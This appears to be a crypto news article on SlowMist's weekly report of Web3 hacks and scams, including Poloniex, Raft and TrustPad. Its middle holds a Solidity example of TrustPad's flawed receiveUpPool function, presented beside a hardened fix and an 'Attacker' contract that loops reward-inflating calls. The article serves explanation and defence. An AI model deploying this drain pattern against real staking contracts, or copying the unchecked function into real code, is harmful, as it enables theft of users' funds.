Web3 cybersecurity firm SlowMist shared its weekly security report, covering incidents that occurred between November 5 and November 11. In total, SlowMist identified nine exploits and scams resulting in a financial loss of $138,522,643.
The most significant security incident of the past week was the hack of Poloniex, a cryptocurrency exchange that has been in operation since 2014. The attack was first detected on November 10, when blockchain security teams, including CertiK, noticed a transfer of over $31 million out of the Poloniex 4 hot wallet. Later that day, it became evident that this was only a fraction of the lost funds, which included ETH worth $33 million, TRX (Tron) worth $48.7 million, and Bitcoin worth $18.6 million, bringing the total loss to roughly $100 million.
Unfortunately, according to SlowMist's update, the damage to the exchange platform was even greater, amounting to $130 million. Despite the significant impact on Poloniex, Justin Sun, from the Tron platform, asserts that the exchange's team plans to compensate its users for the hack.
"Poloniex maintains a healthy financial position and will fully reimburse the affected funds," Sun posted on X on November 10, adding that Poloniex is "exploring opportunities for collaboration with other exchanges to facilitate the recovery of these funds."
On the same day, Sun also addressed the Poloniex hacker in another X post, offering them a seven-day period to consider a 5% bug bounty proposal.
Furthermore, the team behind the Arkham platform, which links cryptocurrency activity to real users, announced that it "has created and funded a bounty to help identify the person or organization behind today's Poloniex exploit."
Other significant incidents last week included the exploit of a contract vulnerability in the Raft protocol, leading to a loss of $3.3 million; the theft of about $2.152 million from an MEV bot; and the attack on CoinSpot, resulting in a loss of $2 million.
While the SlowMist report mentions the hack of TrustPad, a launchpad for gaming, DeFi, and AI projects, the team has not incorporated the losses into the statistics, as the financial damage has not been disclosed yet.
According to the cybersecurity firm Beosin, TrustPad experienced the attack on November 6. The malicious actor exploited the receiveUpPool function, which "did not verify msg.sender, allowing the attacker to manipulate newlockstartTime."
Beosin further explained that "The attacker repeatedly called receiveUpPool() and withdraw() to collect rewards, then called stakePendingRewards to convert the rewards into staking amounts." Finally, the hacker withdrew the rewards via the "withdraw()" function. According to Beosin, at least $155,000 was lost in the incident.
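To make the access-control failure Beosin describes concrete, the following is an added, deliberately simplified Solidity illustration written for this article. It is not TrustPad's code and reproduces no address or function body from the incident; the `LockerBase`, `HardenedLocker` and `Attacker` names, the `upPool` address, the reward formula, and the rule that a lock start may only move forward are all assumptions chosen to show the pattern: a state-changing function that any caller can invoke to rewrite a timestamp the reward math depends on, placed next to a hardened version that checks `msg.sender` and validates the new value.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical model written for this article, NOT TrustPad's contract.
// Names, the reward formula and the upPool role are assumptions.
abstract contract LockerBase {
    address public immutable upPool;               // assumed: the only contract allowed to push lock updates
    uint256 public constant REWARD_PER_SEC = 1e12; // assumed reward rate, scaled by 1e18 below

    struct Stake { uint256 amount; uint256 lockStartTime; }
    mapping(address => Stake) public stakes;
    mapping(address => uint256) public pendingRewards;

    constructor(address _upPool) { upPool = _upPool; }

    // Token transfer omitted; the point is the bookkeeping, not custody.
    function stake(uint256 amount) external {
        Stake storage s = stakes[msg.sender];
        s.amount += amount;
        s.lockStartTime = block.timestamp;
    }

    // Reward is linear in stake size and in time since lockStartTime,
    // so whoever controls lockStartTime controls the payout.
    function rewardOf(address user) public view returns (uint256) {
        Stake memory s = stakes[user];
        if (s.amount == 0 || s.lockStartTime >= block.timestamp) return 0;
        return s.amount * (block.timestamp - s.lockStartTime) * REWARD_PER_SEC / 1e18;
    }

    // Credits accrued rewards and restarts the clock.
    function withdraw() external {
        pendingRewards[msg.sender] += rewardOf(msg.sender);
        stakes[msg.sender].lockStartTime = block.timestamp;
    }

    // Converts credited rewards into stake, so the next cycle pays on a larger base.
    function stakePendingRewards() external {
        uint256 r = pendingRewards[msg.sender];
        pendingRewards[msg.sender] = 0;
        stakes[msg.sender].amount += r;
    }

    function receiveUpPool(address user, uint256 newLockStartTime) external virtual;
}

// VULNERABLE pattern: nothing checks msg.sender, so any account can backdate
// its own lockStartTime, call withdraw(), and repeat.
contract VulnerableLocker is LockerBase {
    constructor(address _upPool) LockerBase(_upPool) {}

    function receiveUpPool(address user, uint256 newLockStartTime) external override {
        stakes[user].lockStartTime = newLockStartTime;
    }
}

// Hardened pattern: only upPool may call, and the timestamp may neither lie in the
// future nor move backwards, so a caller can never manufacture elapsed time.
contract HardenedLocker is LockerBase {
    error NotUpPool();
    error InvalidLockStart();

    constructor(address _upPool) LockerBase(_upPool) {}

    function receiveUpPool(address user, uint256 newLockStartTime) external override {
        if (msg.sender != upPool) revert NotUpPool();
        if (newLockStartTime > block.timestamp || newLockStartTime < stakes[user].lockStartTime) {
            revert InvalidLockStart();
        }
        stakes[user].lockStartTime = newLockStartTime;
    }
}

// The loop Beosin describes, expressed against the vulnerable model:
// backdate, withdraw, compound, repeat. Against HardenedLocker the first
// receiveUpPool call reverts with NotUpPool.
contract Attacker {
    function drain(VulnerableLocker target, uint256 rounds) external {
        target.stake(1 ether);
        for (uint256 i = 0; i < rounds; i++) {
            target.receiveUpPool(address(this), 1); // pretend the lock started at timestamp 1
            target.withdraw();                      // rewards for nearly the whole Unix epoch
            target.stakePendingRewards();           // fold them into a bigger stake
        }
    }
}
```

Because the payout grows with the stake and the stake grows with each round, a handful of rounds is enough to multiply the attacker's position many times over; with `pragma solidity ^0.8`, an attacker who runs too many rounds simply hits a checked-arithmetic revert. The hardened version shows the two checks a reviewer should look for on any function that updates reward-bearing state on behalf of a user: who is allowed to call it, and whether the supplied value can only ever reduce, never inflate, what that user is owed.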
Other incidents mentioned in SlowMist’s report include Mirage Finance, which lost $12,000, and TheStandard, which experienced damages worth $264,000.
The most significant fraud that occurred last week was the fake Ledger Live Web3 scam, enabling malicious actors to steal $588,000. Meanwhile, the deployers of God of Wealth (GOW39) executed a rug pull, making off with $206,251.